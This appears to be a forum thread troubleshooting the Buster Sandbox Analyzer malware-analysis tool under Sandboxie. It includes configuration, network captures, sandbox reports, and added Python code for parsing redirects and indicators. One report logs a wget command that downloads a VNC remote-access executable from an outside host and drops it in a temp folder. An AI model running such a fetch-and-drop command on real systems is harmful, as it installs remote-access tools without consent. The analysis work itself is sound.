[Q] Buster Sandbox Analyzer
* If I put the DLL hook in on a 32-bit XP VM or in Windows 7 64-bit I get a hang on 'start.exe'..?
Here is a video of my issue... (I have the same issue on a full install, NOT PORTABLE, on XP 32-bit with just the 32-bit hooks...)
http://rmccurdy.com/scripts/videos/rmcc ... ISSUES.mp4
Re: [Q] Buster Sandbox Analyzer
What version of Sandboxie are you using?
Re: [Q] Buster Sandbox Analyzer
Whatever the latest is.. 4.08 64-bit
Again, same results with portable and full install, and with a 32-bit install on a VM with XP SP3.. if I put in the stuff to inject the DLL for BSA it dies like in the video above
Re: [Q] Buster Sandbox Analyzer
Update Sandboxie to version 4.09.01 and try again.
Re: [Q] Buster Sandbox Analyzer
Oohh THANKS! It ran that time.. but it seems unstable with the 64-bit DLL: notepad crashes on save and wordpad won't even start?
Sandboxie 4.09
http://rmccurdy.com/scripts/videos/rmcc ... issue2.mp4
http://pastebin.ca/2653468 (API VERBOSE logs)
Re: [Q] Buster Sandbox Analyzer
Does it happen the same with the non-verbose version of LOGAPI?
Do you have the same problem in the host (not inside the VM)?
Re: [Q] Buster Sandbox Analyzer
It seems to run fine on the 32-bit VM with the 32-bit DLL and on my host Windows 7 with the 32-bit DLL, but it does not appear to have any info about reg changes etc.. missing data..
Maybe somebody can post a working Sandboxie.ini? I was reading about the order of params etc... maybe it has to do with that?
32-bit inject on the Windows XP VM is working but missing registry data etc.. same with the Win7 32-bit DLL.. it's doing stuff but not picking up registry changes.
Here is my VM INI
Code:
[GlobalSettings]
TemplateReject=RoboForm
[DefaultBox]
InjectDll=c:\bsa\LOG_API\LOG_API32.DLL
ConfigLevel=7
Template=BlockPorts
Template=LingerPrograms
Template=Chrome_Phishing_DirectAccess
Template=Firefox_Phishing_DirectAccess
Template=AutoRecoverIgnore
BorderColor=#00FFFF,off
Enabled=y
OpenWinClass=TFormBSA
NotifyDirectDiskAccess=y
BoxNameTitle=n
CopyLimitKb=100152
CopyLimitSilent=y
[UserSettings_4BC00582]
SbieCtrl_HideMEssage=*
SbieCtrl_UserName=administrator
SbieCtrl_BoxExpandedView=DefaultBox
SbieCtrl_NextUpdateCheck=1394640635
SbieCtrl_UpdateCheckNotify=y
SbieCtrl_ShowWelcome=n
SbieCtrl_ReloadConfNotify=n
SbieCtrl_AutoApplySettings=n
SbieCtrl_SettingChangeNotify=n
SbieCtrl_ExplorerWarn=n
SbieCtrl_TerminateWarn=n
SbieCtrl_WindowCoords=133,12,837,412
SbieCtrl_ActiveView=40021
Re: [Q] Buster Sandbox Analyzer
The non-verbose DLL does not log file/registry operations.
Re: [Q] Buster Sandbox Analyzer
Thanks!
Looks like VirusTotal changed something; I can't seem to get anything to connect.
* If I go to the redirected URL I get:
* working: https://www.virustotal.com/en/file/17f7 ... /analysis/
* what we get forwarded to in BSA (broken?): https://www.virustotal.com/file/ad7b9c1 ... /analysis/
* looks like you send an MD5 and get redirected to a SHA1 or some shit?
Code:
[ General information ]
* File name: C:\Windows\System32\cmd.exe
* MD5 hash: ad7b9c14083b52bc532fba5948342b98
* VirusTotal detections:
Could not connect to Virus Total
[ Changes to filesystem ]
* Creates file C:\usb\cmd_scripts\quickvnc.exe.1
MD5 hash: b393889603ede50ab712eef4548b843e
VirusTotal detections:
Could not connect to Virus Total
* Creates file (hidden) C:\Windows\SbiePst.dat
MD5 hash: 82812604797f843309bfc8e4a0985879
VirusTotal detections:
Could not connect to Virus Total
Wireshark:
Code:
POST /file/ad7b9c14083b52bc532fba5948342b98/analysis/ HTTP/1.1
Accept: */*
Content-Length: 6
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: http://www.virustotal.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
Connection: Keep-Alive
chain=HTTP/1.1 302 Found
Location: https://www.virustotal.com/file/ad7b9c14083b52bc532fba5948342b98/analysis/
Date: Sun, 16 Mar 2014 02:12:18 GMT
Content-Type: text/html
Server: Google Frontend
Content-Length: 0
Alternate-Protocol: 80:quic,80:quic
If I go to the 301 I get:
Code:
https://www.virustotal.com/file/ad7b9c14083b52bc532fba5948342b98/analysis/
GET /file/ad7b9c14083b52bc532fba5948342b98/analysis/ HTTP/1.1
Host: www.virustotal.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: VT_PREFERRED_LANGUAGE=en
Connection: keep-alive
HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache, must-revalidate
Content-Language: en
Content-Length: 0
Content-Type: text/html; charset=utf-8
Date: Sun, 16 Mar 2014 02:14:06 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Location: https://www.virustotal.com/en/file/ad7b9c14083b52bc532fba5948342b98/analysis/
Pragma: no-cache
Server: Google Frontend
Set-Cookie: VT_PREFERRED_LANGUAGE=en; expires=Sun, 23-Mar-2014 02:14:06 GMT; Max-Age=604800; Path=/
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
X-Firefox-Spdy: 3.1
----------------------------------------------------------
https://www.virustotal.com/en/file/ad7b9c14083b52bc532fba5948342b98/analysis/
GET /en/file/ad7b9c14083b52bc532fba5948342b98/analysis/ HTTP/1.1
Host: www.virustotal.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: VT_PREFERRED_LANGUAGE=en
Connection: keep-alive
HTTP/1.1 403 Forbidden
Content-Language: en
Content-Length: 0
Content-Type: text/html; charset=utf-8
Date: Sun, 16 Mar 2014 02:14:07 GMT
Server: Google Frontend
Set-Cookie: VT_PREFERRED_LANGUAGE=en; expires=Sun, 23-Mar-2014 02:14:07 GMT; Max-Age=604800; Path=/
Vary: Cookie
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
X-Firefox-Spdy: 3.1
----------------------------------------------------------
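The capture above is worth reading as a chain rather than as three separate requests: the first POST goes out as plain HTTP with a Host header that carries a scheme, the server answers 302 to the HTTPS URL, the browser's follow-up GET is then 301'd to the /en/ path, and that final URL returns 403. The following is an added example, not part of Buster Sandbox Analyzer or of the original post; EXCHANGES, Hop, analyse_hop, walk_chain and final_status are names chosen here, and the scheme tag on each hop is an assumption read off the capture (the first request is answered by a redirect to https, the later two were made to the https URL). It parses the raw messages, verifies that each request actually follows the preceding Location, and records what a defender would flag at each hop.

```python
"""Walk a captured HTTP redirect chain and point out what went wrong at each hop.

Added example; it is not part of Buster Sandbox Analyzer. The three exchanges
below are constructed from the Wireshark capture posted in the thread, trimmed
to the headers that matter for the diagnosis.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# (scheme the request went over, raw request, raw response), in wire order.
# Scheme tags are assumptions read from the capture, not values BSA reports.
EXCHANGES: List[Tuple[str, str, str]] = [
    ("http",
     "POST /file/ad7b9c14083b52bc532fba5948342b98/analysis/ HTTP/1.1\n"
     "Content-Length: 6\n"
     "Content-Type: application/x-www-form-urlencoded\n"
     "Host: http://www.virustotal.com\n"
     "\n"
     "chain=",
     "HTTP/1.1 302 Found\n"
     "Location: https://www.virustotal.com/file/ad7b9c14083b52bc532fba5948342b98/analysis/\n"
     "Content-Length: 0\n"),
    ("https",
     "GET /file/ad7b9c14083b52bc532fba5948342b98/analysis/ HTTP/1.1\n"
     "Host: www.virustotal.com\n",
     "HTTP/1.1 301 Moved Permanently\n"
     "Location: https://www.virustotal.com/en/file/ad7b9c14083b52bc532fba5948342b98/analysis/\n"
     "Content-Length: 0\n"),
    ("https",
     "GET /en/file/ad7b9c14083b52bc532fba5948342b98/analysis/ HTTP/1.1\n"
     "Host: www.virustotal.com\n",
     "HTTP/1.1 403 Forbidden\n"
     "Content-Length: 0\n"),
]


@dataclass
class Hop:
    method: str
    target: str
    host: str
    status: int
    location: Optional[str]
    findings: List[str] = field(default_factory=list)


def parse_message(raw: str):
    """Split an HTTP/1.1 message into (start line, {header: value}, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.strip("\n").split("\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def analyse_hop(scheme: str, request: str, response: str) -> Hop:
    """Parse one request/response pair and record anything suspicious about it."""
    req_line, req_hdrs, _ = parse_message(request)
    method, target, _ = req_line.split(" ", 2)
    status_line, resp_hdrs, _ = parse_message(response)
    status = int(status_line.split(" ")[1])
    hop = Hop(method, target, req_hdrs.get("host", ""), status, resp_hdrs.get("location"))
    if scheme == "http":
        hop.findings.append("sent in plaintext: request line and body are readable on the wire "
                            "(here the file hash travels in the URL)")
    if "://" in hop.host:
        hop.findings.append("Host header contains a scheme; RFC 7230 allows only host[:port]")
    if method == "POST" and status in (301, 302):
        hop.findings.append("POST answered with %d; clients typically retry as GET without the body" % status)
    if hop.location and hop.location.startswith("http://"):
        hop.findings.append("redirect sends the client back to plaintext")
    return hop


def walk_chain(exchanges) -> List[Hop]:
    """Analyse every hop and check that each request follows the Location before it."""
    hops = [analyse_hop(*exchange) for exchange in exchanges]
    for prev, nxt in zip(hops, hops[1:]):
        if prev.location:
            m = re.match(r"https?://([^/]+)(/.*)", prev.location)
            if m and (m.group(1) != nxt.host or m.group(2) != nxt.target):
                prev.findings.append("next request does not follow this Location")
    return hops


def final_status(hops: List[Hop]) -> int:
    """Status of the last hop, i.e. what the client ultimately received."""
    return hops[-1].status


CHAIN = walk_chain(EXCHANGES)

if __name__ == "__main__":
    for i, hop in enumerate(CHAIN, 1):
        print("hop %d: %s %s -> %d %s" % (i, hop.method, hop.target, hop.status, hop.location or ""))
        for finding in hop.findings:
            print("   !", finding)
```

Run against the constructed capture, the first hop collects three findings (plaintext, scheme inside Host, POST turned into a redirect) and the chain ends at 403; the two HTTPS hops are clean, which narrows the problem to the initial plaintext request and the final URL rather than to the redirects themselves.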
Re: [Q] Buster Sandbox Analyzer
"Could not connect to Virus Total" should mean BSA did not get a response from the host.
Maybe a temporary problem? Virus Total is often down.
Re: [Q] Buster Sandbox Analyzer
Hrm, same issue today. I tried to force-proxy the HTTPS request through Burp but I could not get it to work. Is there a proxy setting in BSA I can enable to tunnel through? I plan on doing a nice video when I get most of the tool figured out... I have a Cuckoo Sandbox setup but I am trying to make it portable for eating binaries from Security Onion that are unknown... I would like to have this on hand to compare with and test.
Code:
Report generated with Buster Sandbox Analyzer 1.88 at 13:00:44 on 16/03/2014
[ General information ]
* File name: C:\Windows\System32\cmd.exe
* MD5 hash: ad7b9c14083b52bc532fba5948342b98
* VirusTotal detections:
Could not connect to Virus Total
[ Changes to filesystem ]
* Creates file (hidden) C:\Windows\SbiePst.dat
MD5 hash: 82812604797f843309bfc8e4a0985879
VirusTotal detections:
Could not connect to Virus Total
* Creates file C:\Users\admin\AppData\Local\Temp\quickvnc.exe
MD5 hash: b393889603ede50ab712eef4548b843e
VirusTotal detections:
Could not connect to Virus Total
[ Changes to registry ]
* Creates Registry key HKEY_LOCAL_MACHINE\software\microsoft\SQMClient\Windows
* Modifies value "NukeOnDelete=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{04dd247d-9de5-11e3-8bcc-fc15b4e931af}
old value empty
* Modifies value "NukeOnDelete=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{a7b37444-9da4-11e3-8cec-806e6f6e6963}
old value empty
* Creates value "(Default)=31" in key HKEY_CURRENT_USER\software\SandboxAutoExec
* Creates value "SandboxieRpcSs.exe=Sandboxie COM Services (RPC)" in key HKEY_CURRENT_USER\software\classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\C:\temp2\SandboxiePortable\App\Sandboxie
binary data=530061006E00640062006F00780069006500200043004F004D002000530065007200760069006300650073002000280052005000430029000000
* Creates value "Start.exe=Sandboxie Start" in key HKEY_CURRENT_USER\software\classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\C:\temp2\SandboxiePortable\App\Sandboxie
binary data=530061006E00640062006F007800690065002000530074006100720074000000
* Creates value "cmd.exe=Windows Command Processor" in key HKEY_CURRENT_USER\software\classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\C:\Windows\System32
binary data=570069006E0064006F0077007300200043006F006D006D0061006E0064002000500072006F0063006500730073006F0072000000
* Creates value "wget.exe=wget.exe" in key HKEY_CURRENT_USER\software\classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\C:\Windows\System32
binary data=77006700650074002E006500780065000000
[ Network services ]
* Queries DNS "rmccurdy.com".
* C:\Windows\System32\wget.exe Connects to "54.212.205.151" on port 80 (TCP - HTTP).
* Downloads file from "rmccurdy.com/scripts/quickvnc.exe".
[ Process/window/string information ]
* Gets volume information.
* Checks for debuggers.
* Creates process "C:\Windows\system32\wget.exe, wget -U adsfad http://rmccurdy.com/scripts/quickvnc.exe , C:\Users\admin\AppData\Local\Temp".
* Injects code into process "C:\Windows\System32\wget.exe".
* Enumerates running processes.
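The report above is plain text, so comparing runs or feeding the dropped-file hashes, contacted hosts and spawned processes into other tooling means parsing it. The following is an added example, not part of BSA or of the original post; the layout it assumes (bracketed "[ ... ]" section headers, entries starting with "* ", and unmarked continuation lines for MD5 hashes, VirusTotal results and old registry values) is inferred from the reports posted in this thread, SAMPLE_REPORT is a trimmed copy of the report above, and parse_sections and extract_iocs are names chosen here. It goes slightly beyond this one report: the process parser also handles the quoted command lines with embedded ", " that appear in BSA's iexplore.exe entries.

```python
"""Turn a Buster Sandbox Analyzer text report into structured indicators.

Added example; it is not part of BSA. The report layout (bracketed section
headers, '* ' entries, continuation lines for hashes, VirusTotal results and
old registry values) is inferred from the reports posted in this thread, and
SAMPLE_REPORT is a trimmed copy of the one in the post above.
"""
import json
import re
from collections import defaultdict

SAMPLE_REPORT = r"""Report generated with Buster Sandbox Analyzer 1.88 at 13:00:44 on 16/03/2014
[ General information ]
* File name: C:\Windows\System32\cmd.exe
* MD5 hash: ad7b9c14083b52bc532fba5948342b98
* VirusTotal detections:
Could not connect to Virus Total
[ Changes to filesystem ]
* Creates file (hidden) C:\Windows\SbiePst.dat
MD5 hash: 82812604797f843309bfc8e4a0985879
VirusTotal detections:
Could not connect to Virus Total
* Creates file C:\Users\admin\AppData\Local\Temp\quickvnc.exe
MD5 hash: b393889603ede50ab712eef4548b843e
VirusTotal detections:
Could not connect to Virus Total
[ Changes to registry ]
* Creates Registry key HKEY_LOCAL_MACHINE\software\microsoft\SQMClient\Windows
* Modifies value "NukeOnDelete=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket
old value empty
[ Network services ]
* Queries DNS "rmccurdy.com".
* C:\Windows\System32\wget.exe Connects to "54.212.205.151" on port 80 (TCP - HTTP).
* Downloads file from "rmccurdy.com/scripts/quickvnc.exe".
[ Process/window/string information ]
* Checks for debuggers.
* Creates process "C:\Windows\system32\wget.exe, wget -U adsfad http://rmccurdy.com/scripts/quickvnc.exe , C:\Users\admin\AppData\Local\Temp".
* Injects code into process "C:\Windows\System32\wget.exe".
"""

FILE_RE = re.compile(r"^Creates file (?:\(hidden\) )?(.+)$")
MD5_RE = re.compile(r"^MD5 hash: ([0-9a-fA-F]{32})$")
DNS_RE = re.compile(r'^Queries DNS "([^"]+)"')
CONN_RE = re.compile(r'^(.+?) Connects to "([^"]+)" on port (\d+)')
DL_RE = re.compile(r'^Downloads file from "([^"]+)"')
PROC_RE = re.compile(r'^Creates process "(.*)"\.$')
REG_RE = re.compile(r'^(Creates|Modifies|Deletes) (?:Registry key|value "[^"]*" in key) (.+)$')
VT_DOWN = "Could not connect to Virus Total"


def parse_sections(text):
    """Group the report into {section: [entry]}; an entry is the '* ' line (marker
    removed) followed by its continuation lines."""
    sections = defaultdict(list)
    current = None
    for line in text.splitlines():
        line = line.rstrip()
        header = re.fullmatch(r"\[ (.+) \]", line)
        if header:
            current = header.group(1)
        elif current is None or not line:
            continue  # preamble before the first section, or blank line
        elif line.startswith("* "):
            sections[current].append([line[2:]])
        elif sections[current]:
            sections[current][-1].append(line)
    return sections


def extract_iocs(text):
    """Pull out the indicators a responder would pivot on."""
    sections = parse_sections(text)
    iocs = {"dropped_files": [], "dns": [], "connections": [], "downloads": [],
            "processes": [], "registry": [], "vt_unavailable": VT_DOWN in text}
    for entry in sections.get("Changes to filesystem", []):
        m = FILE_RE.match(entry[0])
        if m:
            hashes = [h.group(1).lower() for h in map(MD5_RE.match, entry[1:]) if h]
            iocs["dropped_files"].append({"path": m.group(1), "md5": hashes[0] if hashes else None})
    for entry in sections.get("Changes to registry", []):
        m = REG_RE.match(entry[0])
        if m:
            iocs["registry"].append({"action": m.group(1), "key": m.group(2)})
    for entry in sections.get("Network services", []):
        head = entry[0]
        if (m := DNS_RE.match(head)):
            iocs["dns"].append(m.group(1))
        elif (m := CONN_RE.match(head)):
            iocs["connections"].append({"image": m.group(1), "dst": m.group(2), "port": int(m.group(3))})
        elif (m := DL_RE.match(head)):
            iocs["downloads"].append(m.group(1))
    for entry in sections.get("Process/window/string information", []):
        m = PROC_RE.match(entry[0])
        if m:
            # BSA writes "image, command line, working dir"; the command line may itself
            # contain ", ", so split off the first and last fields and keep the middle intact.
            parts = m.group(1).split(", ")
            iocs["processes"].append({"image": parts[0], "cmdline": ", ".join(parts[1:-1]).strip(),
                                      "cwd": parts[-1]})
    return iocs


if __name__ == "__main__":
    print(json.dumps(extract_iocs(SAMPLE_REPORT), indent=2))
```

The vt_unavailable flag is the useful bit for this thread: when it is set, every md5 in dropped_files still needs a hash lookup elsewhere, so the parser output tells you at a glance whether a report's "VirusTotal detections" lines carry any information at all.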
Re: [Q] Buster Sandbox Analyzer
There are no proxy settings to connect to Virus Total.
I just checked and Virus Total information is included correctly in the report.
Re: [Q] Buster Sandbox Analyzer
Can you send me a link to the BSA binary you are using? I am still getting "Could not connect to Virus Total". I think it's all set up perfectly otherwise.. I got portable Sandboxie with BSA
Re: [Q] Buster Sandbox Analyzer
Yup... that's the same one I am running
* closed BSA
* removed the config folder
* started BSA
* set the correct path..
* running Win7 64-bit, no firewall, no AV
* same thing inside the Windows XP image..
* maybe you could send your entire BSA setup with the Sandboxie ini? Maybe I'm missing something somehow?
WinXP run...:
Code:
Report generated with Buster Sandbox Analyzer 1.88 at 11:34:49 on 28/03/2014
[ General information ]
* File name: C:\WINDOWS\System32\cmd.exe
[ Changes to filesystem ]
* Creates file (hidden) C:\WINDOWS\SbiePst.dat
VirusTotal detections:
Could not connect to Virus Total
* Modifies file (hidden) C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
* Modifies file (hidden) C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
* Creates hidden folder C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012014031720140324
* Creates file (hidden) C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012014031720140324\index.dat
VirusTotal detections:
Could not connect to Virus Total
* Creates hidden folder C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012014032820140329
* Creates file (hidden) C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012014032820140329\index.dat
VirusTotal detections:
Could not connect to Virus Total
* Creates file C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{8F78DBED-B68E-11E3-AF35-0800271871C1}.dat
VirusTotal detections:
Could not connect to Virus Total
* Creates file C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\{8F78DBEE-B68E-11E3-AF35-0800271871C1}.dat
VirusTotal detections:
Could not connect to Virus Total
* Creates file C:\Documents and Settings\Administrator\Desktop\quickclean.exe
VirusTotal detections:
Could not connect to Virus Total
[ Changes to registry ]
* Deletes Registry key HKEY_LOCAL_MACHINE\software\Classes\clsid\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}
* Deletes Registry key HKEY_LOCAL_MACHINE\software\Classes\clsid\{DBC80044-A445-435B-BC74-9C25C1C588A9}
* Deletes Registry key HKEY_LOCAL_MACHINE\software\Classes\CompressedFolder\shell\open\ddeexec
* Modifies value "EnableDCOM=4E000000" in key HKEY_LOCAL_MACHINE\software\microsoft\ole
old value "EnableDCOM=59000000"
* Modifies value "NukeOnDelete=00000001" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Explorer\BitBucket
old value empty
* Creates value "SymbolicLinkValue=\REGISTRY\USER\Sandbox_Administrator_DefaultBox\user\current_classes" in key HKEY_CURRENT_USER\software\classes
binary data=5C00520045004700490053005400520059005C0055005300450052005C00530061006E00640062006F0078005F00410064006D0069006E006900730074007200610074006F0072005F00440065006600610075006C00740042006F0078005C0075007300650072005C00630075007200720065006E0074005F0063006C0061007300730065007300
* Modifies value "IE8RunOnceLastShown_TIMESTAMP=0A7B09539B4ACF01" in key HKEY_CURRENT_USER\software\Microsoft\Internet Explorer\Main
old value "IE8RunOnceLastShown_TIMESTAMP=DE4118132345CF01"
* Creates value "BrowseNewProcess=yes" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess
binary data=7900650073000000
* Modifies value "a=IEXPLORE.EXEC:\Documents and Settings\Administrator\Desktop" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU
binary data=49004500580050004C004F00520045002E00450058004500000043003A005C0044006F00630075006D0065006E0074007300200061006E0064002000530065007400740069006E00670073005C00410064006D0069006E006900730074007200610074006F0072005C004400650073006B0074006F0070000000
old value "a=IEXPLORE.EXE\\10.0.2.2\c$\delete"
binary data=49004500580050004C004F00520045002E0045005800450000005C005C00310030002E0030002E0032002E0032005C00630024005C00640065006C006500740065000000
* Modifies value "b=C:\Documents and Settings\Administrator\Desktop\quickclean.exe" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*
binary data=43003A005C0044006F00630075006D0065006E0074007300200061006E0064002000530065007400740069006E00670073005C00410064006D0069006E006900730074007200610074006F0072005C004400650073006B0074006F0070005C0071007500690063006B0063006C00650061006E002E006500780065000000
old value "b=C:\Documents and Settings\Administrator\Desktop\tzxt.txt"
binary data=43003A005C0044006F00630075006D0065006E0074007300200061006E0064002000530065007400740069006E00670073005C00410064006D0069006E006900730074007200610074006F0072005C004400650073006B0074006F0070005C0074007A00780074002E007400780074000000
* Modifies value "MRUList=bajihgfedc" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*
binary data=620061006A0069006800670066006500640063000000
old value "MRUList=ajihgfedcb"
binary data=61006A00690068006700660065006400630062000000
* Creates value "d=C:\Documents and Settings\Administrator\Desktop\quickclean.exe" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\exe
binary data=43003A005C0044006F00630075006D0065006E0074007300200061006E0064002000530065007400740069006E00670073005C00410064006D0069006E006900730074007200610074006F0072005C004400650073006B0074006F0070005C0071007500690063006B0063006C00650061006E002E006500780065000000
* Modifies value "MRUList=dcba" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\exe
binary data=64006300620061000000
old value "MRUList=cba"
binary data=6300620061000000
* Modifies value "Count=0000005A" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Ext\Stats\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}\iexplore
old value "Count=00000059"
* Modifies value "Time=DE07030005001C000F0023001200B602" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Ext\Stats\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}\iexplore
old value "Time=DE070300050015001000350038002B00"
* Modifies value "Count=0000000A" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CFBFAE00-17A6-11D0-99CB-00C04FD64497}\iexplore
old value "Count=00000009"
* Modifies value "Time=DE07030005001C000F00230011004602" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CFBFAE00-17A6-11D0-99CB-00C04FD64497}\iexplore
old value "Time=DE0702000200190014003A000B002301"
* Modifies value "Count=0000005A" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore
old value "Count=00000059"
* Modifies value "Time=DE07030005001C000F0023001200B602" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore
old value "Time=DE070300050015001000350038002B00"
* Modifies value "LoadTime=00000007" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore
old value "LoadTime=00000009"
* Modifies value "Count=00000056" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore
old value "Count=00000055"
* Modifies value "Time=DE07030005001C000F00230011004103" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore
old value "Time=DE0703000500150010001E002900A800"
* Modifies value "Count=00000056" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Ext\Stats\{FB5F1910-F110-11D2-BB9E-00C04F795683}\iexplore
old value "Count=00000055"
* Modifies value "Time=DE07030005001C000F00230011004103" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Ext\Stats\{FB5F1910-F110-11D2-BB9E-00C04F795683}\iexplore
old value "Time=DE0703000500150010001E002900B200"
* Deletes Registry key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014022420140303
* Deletes Registry key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014031720140318
* Creates value "CachePath=%USERPROFILE%\Local Settings\History\History.IE5\MSHist012014031720140324" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014031720140324
binary data=25005500530045005200500052004F00460049004C00450025005C004C006F00630061006C002000530065007400740069006E00670073005C0048006900730074006F00720079005C0048006900730074006F00720079002E004900450035005C004D00530048006900730074003000310032003000310034003000330031003700320030003100340030003300320034000000
* Creates value "CachePrefix=:2014031720140324: " in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014031720140324
binary data=3A0032003000310034003000330031003700320030003100340030003300320034003A0020000000
* Creates value "CacheLimit=00002000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014031720140324
* Creates value "CacheOptions=0000000B" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014031720140324
* Deletes Registry key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014031820140319
* Deletes Registry key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014032120140322
* Creates value "CachePath=%USERPROFILE%\Local Settings\History\History.IE5\MSHist012014032820140329" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014032820140329
binary data=25005500530045005200500052004F00460049004C00450025005C004C006F00630061006C002000530065007400740069006E00670073005C0048006900730074006F00720079005C0048006900730074006F00720079002E004900450035005C004D00530048006900730074003000310032003000310034003000330032003800320030003100340030003300320039000000
* Creates value "CachePrefix=:2014032820140329: " in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014032820140329
binary data=3A0032003000310034003000330032003800320030003100340030003300320039003A0020000000
* Creates value "CacheLimit=00002000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014032820140329
* Creates value "CacheOptions=0000000B" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014032820140329
* Modifies value "SavedLegacySettings=460000002F030000010000003B000000687474703D3132372E302E302E313A383038303B6674703D3132372E302E302E313A383038303B736F636B733D3132372E302E302E313A3830383000000000000000000000000000000000C02E43C5DC71CC0100000000000000000000000001000000020000000A00020F0000000000000000010000000500000088D01A0058E31B000000000010010000FFFFFFFF000000000C00000000000000010000000000000000000000000000000000000003A8020000000000C000000000000046409D05229E7ECF11AE5A00AA00A7112B770069006E0064006F0077007300000000000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
